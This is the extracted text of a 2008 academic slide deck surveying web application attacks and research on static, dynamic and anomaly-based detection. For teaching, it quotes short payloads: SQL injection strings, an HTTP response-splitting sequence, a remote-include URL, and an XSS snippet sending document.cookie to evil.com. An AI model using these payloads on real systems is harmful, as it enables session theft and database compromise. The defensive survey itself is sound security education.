Dec. 18/2008 Vulnerability Analysis of Web-based Applications Yi tang Email: [email protected]

Dec. 18/2008

Vulnerability Analysis of Web-basedApplications

Yi tang

Email:

[email protected]

2

Outline

1. Current web security trend2. Web Technologies3. Web based attacks4. Vulnerability Analysis5. Conclusion

web security

As web applications for critical services has increased, attacks against web has grown as well. A series of characteristics make it a valuable for an attacker. web applications are often designed to be widely

accessible Web applications often interface with back-end

component containing sensitive data most popular web languages are currently easy enough

to allow novices to start their own applications

3/50

Trend

In the first semester of 2005, Symantec cataloged 1,100 new vulnerabilities, which represent well over half of all new vulnerabilities, as affecting web-based applications.

4/50

A new statistic from white book of Symantec threaten report.

5

Outline

1. Current web security trend2. Web technologies3. Web based attacks4. Vulnerability Analysis5. Conclusion

Common Gateway Interface

One of the first mechanisms enabled dynamic content : Common Gateway Interface (CGI)

It defines a mechanism that a server can use to interact with external applications.

Disadvantage: requires to create a new process and executed for each request

Server-specific APIs: Low initialization cost and can perform more general

functionalities than CGI-based programs. complex when writing a program, it involves some

knowledge of the server’s inner workings.6/50

7/50

users to

authenticatetasks of parameter

decoding and

session manage

Embedded Web Application Frameworks

Today, most web application implementation is a middle way between original CGI and server specific APIs.

an interpreter or compiler used to encode the application’s components and define rules that govern the interaction between the server and the application’s components.

Web application frameworks are available for a variety of languages, such as PHP, Perl, and Python. (interpreted, object-oriented, loosely typed)

8/50

A sample PHP program

9/50

parameters of requests

through HTTP GET

method are available

in the $ GET array

native support

for sessions,

easy to keep track

different requests users input are

first checked using

the validate function

10

Outline


Attacks

Web-based applications have fallen prey to a variety of different attacks that violate different security properties.

This survey focuses on attacks behave in unforeseen ways to disclose sensitive information or execute commands on behalf of the attacker.

Currently, most of attacks against web applications can be ascribed to one class of vulnerabilities: improper input validation.

11/50

Interpreter Injection

Many dynamic languages include functions to dynamically compose and interpret code. include and require - Includes and evaluates a file as

PHP code. eval, preg_replace - Evaluates a string as PHP

code. exec, passthru, system, popen, shell_exec, popen,

pcntl_exec, proc_open and the backtick - Executes its input as a shell command.

Attack on the server

12/50

Sample of interpreter injection in Double Choco Latte

13/50

url

Server without fully filtering the parameter of menuAction

Filename Injection

Most languages of web are allowed to dynamically include files to interpret content or present them to users.

E.g. to generate different page content depending on user’s preferences, such as for internationalization purposes.

Because PHP allows for the inclusion of remote files, the code to be added to the application can be hosted on a site under the attacker’s control.

14/50

a filename injection vulnerability in txtForum

In txtForum, pages are divided in parts, e.g., header, footer, forum view, and can be customized by using different “skins,” which are different combination of colors, fonts, and other presentation parameters.

Skin with value http://[attacker-site] leads to the execution of the code at http://[attacker-site]/header.tpl

15/50

Script Cross-site attack （ XSS） In the attack, an attacker forces a client, typically a web browser, to execute attacker-

supplied executable code, typically JavaScript code, which runs in the context of a trusted web site.

Sample:

http://www.vulnerable.site/welcome.cgi?name=<script>alert(document.cookie)</script>

16/50

Impact of XSS-Attacks

Access to authentication credentials for Web application Cookies, Username and Password

XSS is not a harmless flaw ! Normal users

Access to personal data (Credit card, Bank Account) Access to business data (Bid details, construction

details) Misuse account (order expensive goods)

High privileged users Control over Web application Control/Access: Web server machine Control/Access: Backend / Database systems

17

SQL Injection

A web-based application has an SQL injection vulnerability when it uses unsanitized user data to compose queries that are later passed to a relational database for evaluation.

This can lead to arbitrary queries being executed on the database with the privileges of the vulnerable application.

$activate = $_GET [" activate "];

$result = dbquery (" SELECT * FROM new_users " ,

" WHERE user_code =’ $activate ’");

18/50

where the activate parameter is set to the string ’ OR 1=1 -- the query will return the content of the entire new users table.

SELECT * FROM new_users WHERE user_code =‘ ‘ OR 1=1

SQL Injection

19/50

Session Hijacking

HTTP is a stateless protocol, no built-in mechanism allows application to maintain state throughout a session.

The session state can be maintained in different ways. It can be encoded in a document transmitted to the user in a

way, such as cookie or HTML hidden form fields and sent back as part of later requests.

Problem: the cookie or hidden forms may be changed by dishonest users.

each user is assigned a unique session ID Problem: Session fixation

20/50

Session Hijacking

Session fixation: the attacker sets a user's session id to one known to him,

for example by sending the user an email with a link that contains a particular session id.

http://[target]/login.php?sessionid=1234

21/50

Response Splitting

the attacker is able to set the value of an HTTP header field, and the resulting response stream is interpreted by the attack target as two responses

To perform response splitting the attacker must be able to inject data containing the header termination characters and the beginning of a second header.

This is usually possible when user’s data is used (unsanitized) to determine the value of an HTTP header

22/50

Response Splitting

<% response.sendRedirect (“/by_lang.jsp?lang =" +

request. getParameter (" lang "));%>

Location: http://vulnerable.com/by_lang.jsp?lang=en_US.

However, if the lang=dummy%0d%0a

Content-Length:%200

%0d%0a%0d%0a

HTTP/1.1%20200%20OK%0d%0a

Content-Type:%20text/html%0d%0a

Content-Length:%2019%0d%0a%0d%0a

<html>New document</html> 23/50

Response Splitting

Response Splitting often related to the attack of web cache poisoning

Two condition: a caching proxy server interprets the response

stream as containing two documents associates the second one with the original

request, then an attacker would be able to insert in the

cache of the proxy a page of his choice in association to a URL in the vulnerable application.

24/50

25

Outline


Vulnerability analysis

vulnerability analysis refers to the process of assessing the security of an application through auditing of either the application’s code or the behavior for possible security problems.

The identification of vulnerabilities in web applications can be performed following one of two orthogonal detection approaches: the negative (vulnerability based) approach and the positive (behavior based) approach.

26/50

Detection approach

Negative approach: builds abstract models of known vulnerabilities and then matches the models against web-based applications, to identify instances of the modeled vulnerabilities.

Positive approach: builds models of the normal behavior of an application (eg. using machine-learning techniques) and then analyze the application behavior to identify any abnormality that might be caused by a security violation.

Two fundamental analysis techniques that can be used to do the analysis : static analysis and dynamic analysis.

27/50

Static analysis: provides a set of pre-execution techniques for predicting dynamic properties of the target program. it does not require the application to be deployed and executed.

Dynamic analysis: consists of a series of checks to detect vulnerabilities and prevent attacks at run-time. It is less prone to false positives, since the analysis is done on run-time.

In practice, hybrid approaches mixed both static and dynamic techniques, are frequently used to combine the strengths and minimize the limitations of the two approaches.

28/50

29

Outline

1. Current web security trend2. Web Technologies3. Web based attacks4. Vulnerability Analysis

1. Negative approach2. Positive approach

5. Conclusion

Negative approach: taint propagation

Most negative approaches assumes that vulnerabilities are the result of insecure data flow in applications.

We attempt to identify when untrusted user input propagates to security-critical functions(sinks) without being properly checked and sanitized.

taint propagation: data from input is marked as tainted and its propagation throughout the program is traced to check whether it can reach sinks.

30/50

Negative static Approaches

static analysis can be applied before the deployment. It does not require modification of the deployment environment.

Currently focus on the analysis of applications written in PHP and Java

It may require the source code of web site to do analysis.

31/50

WebSSARI (WWW’04)

WebSSARI (WWW’04) is one of the first works that applies taint propagation analysis in web security.

WebSSARI targets three types of vulnerabilities: cross-site scripting, SQL injection, and general script injection.

The tool uses flow-sensitive, intra-procedural analysis based on a lattice model and typestate. Typestate: PHP is extended with two types: tainted and

untainted, the tool keeps track the type-state of variables. In order to untaint the tainted data, the data has to be

processed by a sanitization routine or cast to a safe type.

32/50

It predefine 3 file: a file with preconditions to all sensitive functions (the sink) a file with of known sanitization functions, for untaited. a file specifying all possible sources of untrusted input

When the tool finds tainted data reaches sinks, it automatically inserts sanitization routines.

33/50

If (A) {

A=X;

} else {

if (B) {

A=Y;

} else {

A=Z;

}

}

Echo (A);

If (C) {

If (A)

If (B)

Echo(A)

A=Y;

A=X;

A=Z;

If (C)

A X Y Z

T T U T

A X Y Z

T T U T

Typestate

A X Y Z

U T U T A X Y Z

T T U T

A X Y Z

U T U T

T=LUB(T,U,T)

At every program point,

the algorithm keeps a

static invariant representing the most dangerous possible state at that point.

Control flow graph

If (A) {

A=X;

} else {

if (B) {

A=Y;

} else {

A=Z;

}

}

Echo (A);

If (C) {

If (A)

If (B)

Echo(A)

A=Y;

A=X;

A=Z;

If (C)

• Typestate offers a balance between precision and cost

• Maintains a typestate for every diverging path

– Increases precision

– Induces memory cost

• Merges typestate at execution merge points

– Limits memory cost

– Induces imprecision

– Denies counterexample support

• WebSSARI incorporates flow-sensitive typing based on typestate

TypestateIf (A)

If (B)

Echo(A)

A=Y;

A=X;

A=Z;

If (C) Control flow graph

36

Runtime Protection

Different sanitization routines are automatically inserted just before vulnerable function calls

Depending on the vulnerable function, one of the three following routines is inserted HTML output sanitization Database command sanitization System command sanitization

37

System Implementation

Problem of WebSSARI:

Uses intra-procedural algorithm and thus only models information flow not cross function boundaries. (Xie Usenix 06)

All dynamic variables, arrays are considered tainted, reduce the accuracy of the analysis.

Can not accurately tracking arrays, alias and object-oriented code. (Pixy Oakland 06 )

38/50

Summary

static analysis heavily depends on language specific parsers. It is not generally a problem for general purpose languages

Web applications use dynamic scripting languages to facilitate the use of complex data structures, such as arrays and hash, hard to track.

One main drawbacks of static analysis is its susceptibility to false positives caused by inevitable analysis imprecisions..

Precise evaluation of sanitization routines is more difficult. Just regular expression maybe not enough

39/50

Dynamic negative approach

Dynamic negative techniques is also based on taint analysis. Untrusted sources, sensitive sinks, and tainting propagates also need to be modeled

Instead of running analysis on source code, program or interpreter are extended to collect the information and the tainted data is tracked as execution.

Perl’s Taint mode: Perl interpreter is invoked with the –T option it makes sure that no data obtained from the outside environment can be used in security critical functions (too conservative)

40/50

“Automatically Hardening Web Applications Using Precise Tainting”, SEC’05

Propose modification of the PHP interpreter to dynamically track tainted data in PHP programs.

Fully automated Aware of application semantics Replace PHP interpreter with a modified

interpreter that: Keeps track of which information comes from

untrusted sources (precise tainting) Checks how untrusted input is used

41/50

HTTP Server

PHP Interpreter

1

8

2 3

4

5

File System

file.php

Database

Cli

ent

Web Server System APIs

67

PHPreventPHPrevent

Coarse Grain Tainting

Provided by many scripting languages (Perl, Ruby)

Untrusted input is tainted Everything touched by tainted data becomes

tainted

$query = "SELECT real_name FROM users WHERE user = '" . $user

. "'AND pwd = '"

. $pwd . "' ";Entire $query string is tainted

Precise Tainting

$query = "SELECT real_name FROM users WHERE user = '" . $user . "'AND pwd = '" . $pwd . "' ";$query = "SELECT real_name FROM users WHERE user = '' OR 1 = 1; -- ';'AND pwd = '' ";

• Untrusted input is tainted• Taint markings are maintained at character level

– Depends on semantics of program

• Only really tainted data is tainted

Precise Checking

Wrappers around PHP functions that handle updating and checking precise taint information

Conservative: no false negatives while minimizing false positives Behavior only changes when an attack is likely

Preventing SQL Injection

Parse the query using the SQL parser: identify interpreted text

Disallow SQL keywords or delimiters in interpreted text that is tainted Query is not sent to database Error response it returned

"SELECT real_name FROM users WHERE user = '' OR 1 = 1; -- ';' AND pwd = '' ";

Preventing PHP Injection

Disallow tainted data to be used in functions that treat input strings as PHP code or manipulate system state place wrappers around these functions to enforce

this rule phpBB attack prevented by wrappers around

preg_replace

Preventing Cross Site Scripting

Wrappers around output functions Buffer output and then parse the tainted output with HTML Tidy

Our defense takes advantage of precise tainting information to identify web page output generated from untrusted sources.

Dangerous content was determined by examining HTML grammar

Sanitize it by removing tags

<b>Hello</b> Safe<b onmouseover= 'location.href=

"http://evil.com/steal.php?" + document.cookie'>Hello</b> Unsafe

Summary of dynamic negative method

a modified interpreter can be applied to all web applications, all required information is available as execution result. Further, no complex analysis for features such as alias analysis is required.

However, no guarantees to all cases

49/50

Summary of negative method

If taint propagation is done statically, the precision highly depends on the ability of dealing the complexities of dynamic features. Precise evaluation of sanitization routines is especially important

If taint propagation analysis is done dynamically, on the other hand, issues of analysis completeness, application stability and performance arise.

50/50

51

Outline

1. Current web security trend2. Web Technologies3. Web based attacks.4. Vulnerability Analysis

1. Negative approach2. Positive approach

5. Conclusion

Positive Approaches

Based on deriving models of the “normal” behavior Assumption:

Deviations mean attacks or vulnerabilities; attacks create an anomalous manifestation;

an anomaly detection system utilizes a number of statistical models to identify anomalous events in a set of web requests that use parameters to pass values to the server-side components of a web-based application

52/50

Anomaly-based

Based on assumption that normal traffic can be defined

Attack patterns will differ from such ‘normal’ traffic Anomaly-based detection system will go through a

learning phase to register such ‘normal’ traffic Analysis will be done for individual field attributes

as well as for entire query string This difference should be able to be expressed

quantitatively

Anomaly Detection of Web-based Attacks Cristopher Kruegel & Giovanni Vigna CCS ‘03

it is hard to keep intrusion detection signature sets updated with respect to the large numbers of vulnerabilities discovered daily.

This paper presents an intrusion detection system that uses a number of different anomaly detection techniques to detect attacks against web servers and web-based applications.

The anomaly detection system takes as input the web server log files which conform to the Common Log Format and produces an anomaly score for each web request.

54/50

Data Model

Only GET requests with no header 169.229.60.105 − johndoe [6/Nov/2002:23:59:59 −0800 "GET

/scripts/access.pl?user=johndoe&cred=admin" 200 2122

Only Query string, no path For query q, Sq={a1,a2}

Path Query

a1=v1 a2=v2

Detection model

Each model is associated with weight wm.

Each model returns the probability pm.

A value close to 0 indicates anomalous event i.e. a value of pm close to 1 indicates anomalous event.

If the weighted score is greater than the detection threshold determined during the learning phase for that parameter, the anomaly detector considers the entire request anomalous and raises an alert.

Anomaly-based

Some of the attributes that could be analyzed are: Input length Character distribution Parameter string structure Parameter absence or presence Order of parameters

Attribute Length

Normal Parameters Fixed sized tokens (session identifiers) Short strings (input from HTML form) So, doesn’t vary much associated with certain prg.

Malicious activity E.g. for buffer overflow

Goal: to approximate the actual but unknown distribution of the parameter lengths and detect deviation from the normal

Learning & Detection

Learning Calculate mean and variance for the lengths l1,l2,...,ln for

the parameters processed. N queries with this attribute

Detection Chebyshev inequality

This computation bound has to be weak, to result in high degree of tolerance (very weak)

Only obvious outliers are flagged as suspicious

Attribute character distribution

Attributes have regular structure, printable characters There are similarities between the character frequencies of

query parameters. Relative character frequencies of the attribute are sorted in

relative order

Normal freq. slowly decrease in value

Malicious Drop extremely fast (peak cause by single character distrib.) Nearly not at all (random values)

Passwd – 112 97 115 115 119 110 0.33 0.17 0.17 0.17 0.17 0 255 times

ICD(0) = 0.33 & ICD(1) to ICD(4) = 0.17 ICD(5)=0

Why is it useful?

Cannot be evaded by some well-known attempts to hide malicious code in the string. Nop operation substituted by similar behavior (add

rA,rA,0)

But not useful in when small routine change in the payload distribution

Learning and detection

Learning For each query attribute, its character distribution is

stored ICD is obtained by averaging of all the stored

character distributions

.5 .25 .25 0 0

.75 .2 .1 0 0

.25 .25 .25 .25 0

.5 .22 .2 .08 0

q1

q2

q3

avg

Learning and detection (cont...)

Pearson chi-square test Not necessary to operate on all values of ICD

consider a small number of intervals, i.e. bins

Calculate observed and expected frequencies Oi= observer frequencies for each bin Ei= relative freq of each bin * length of the attribute

Compute chi-square Calculate probability from chi-square predefined

table

Structural inference

Structural is the regular grammar that describes all of its normal legitimate values.

Why?? Craft attack in a manner that makes its manifestation

appear more regular. For example, non-printable characters can be

replaces by groups of printable characters.


Basic approach is to generalize grammar as long as it seems reasonable and stop before too much structural information is lost.

MARKOV model and Bayesian probability NFA

Each state S has a set of ns possible output symbols o which are emitted with the probability of ps(o).

Each transition t is marked with probability p(t), likelihood that the transition is taken.


Start

Terminal

a|p(a) = 0.5b|p(b) = 0.5

a|p(a) = 1

c|p(c) = 1

b|p(b) = 1

1.0

1.0

1.0

0.4

0.4

0.70.3

0.2

So, probability of ‘ab’

P(w) = (1.0*0.3*0.5*0.2*0.5*0.4)+

(1.0*0.7*1.0*1.0*1.0*1.0)


By adding the probabilities calculated for each input training element


Aim to maximize the product. Conflict between simple models that tend to over-

generalize and models that perfectly fit the data but are too complex.

Simple model- high probability, but likelihood of producing the training data is extremely low. So, product is low

Complex model- low probability, but likelihood of producing the training data is high. Still product is low.

Model starts building up and generating input data then the states starts building up using Viterbi algorithm.


Detection The problem is that even a legitimate input that has

been regularly seen during the training phase may receive a very small probability values

The probability values of all possible input words sum to 1

Model return value 1 if valid output otherwise 0 when the value cannot be derived from the given grammar

Token finder

Whether the values of the attributes are from a limited set of possible alternatives (enumeration)

When malicious user try to usually pass the illegal values to the application, the attack can b detected.


Learning Enumeration: when different occurrences of

parameter values is bound by some threshold t. Random: when the no of different argument

instances grows proportionally Calculate statistical correlation


Detection If any unexpected happens in case of enumeration,

then it returns 0, otherwise 1 and in case of randomness it always return 1.

< 0, enumeration> 0, random

Attribute presence of absence Client-side programs, scripts or HTML forms pre-

process the data and transform in into a suitable request.

Hand crafted attacks focus on exploiting a vulnerability in the code that processes a certain parameter value and little attention is paid on the order.


Learning Model of acceptable subsets Recording each distinct subset Sq={ai,...ak} of

attributes that is seen during the training phase.

Detection The algorithm performs for each query a lookup of

the current attribute set. If encountered then 1 otherwise 0

Attribute order

Legitimate invocations of server-side programs often contain the same parameters in the same order.

Hand craft attacks don’t

To test whether the given order is consistent with the model deduced during the learning phase.


Learning: A set of attribute pairs O such that:

Each vertex vi in directed G is associated with the corresponding attribute ai.

For every query ordered list is processed. Att. Pair (as,at) in this list, with s ~= t and 1<=s,t<=i, a

directed edge is inserted into the graph from vs to vt.


Graph G contains all ordered constraints imposed by queries in the training data.

Order is determined by Directed edge Path

Detection Given a query with attributes a1,a2,...,ai and a set of

order constraints O, all the parameter pairs (aj,ak) with j~=k and 1 <= j,k <= I

Violation then return 0 otherwise 1

Conclusions of this paper

Anomaly-based intrusion detection system on web. Takes advantage of application-specific correlation

between server-side programs and parameters used in their invocation.

Parameter characteristics are learned from the input data.

Tested on Google, and two universities in US and Europe

Summary positive approaches

Advantage: By specifying normal behavior, it can detect unknown attack

Problem: the concept of normality is difficult to define vulnerable to mimicry attacks: detection threshold still

requires manual intervention and substantial expertise.

79/50

80

Outline

1. Current web security trend2. Web based attacks3. Vulnerability Analysis4. Conclusion

No method can be considered “the silver bullet”, many methods combine strengths from various techniques.

Important to provide techniques to better model sanitization and to assess whether a sanitization operation is appropriate for the task at hand

Challenges by novel web-specific attack techniques. Improper input validation are well-known and studied

There is no standard dataset usable as base-line for evaluation.

81/50

Future our work

To get some static and dynamic method specially support the XSS script code detection.

82/50

Thank you!

83

Documents

Dec. 18/2008 Vulnerability Analysis of Web-based Applications Yi tang Email: [email protected]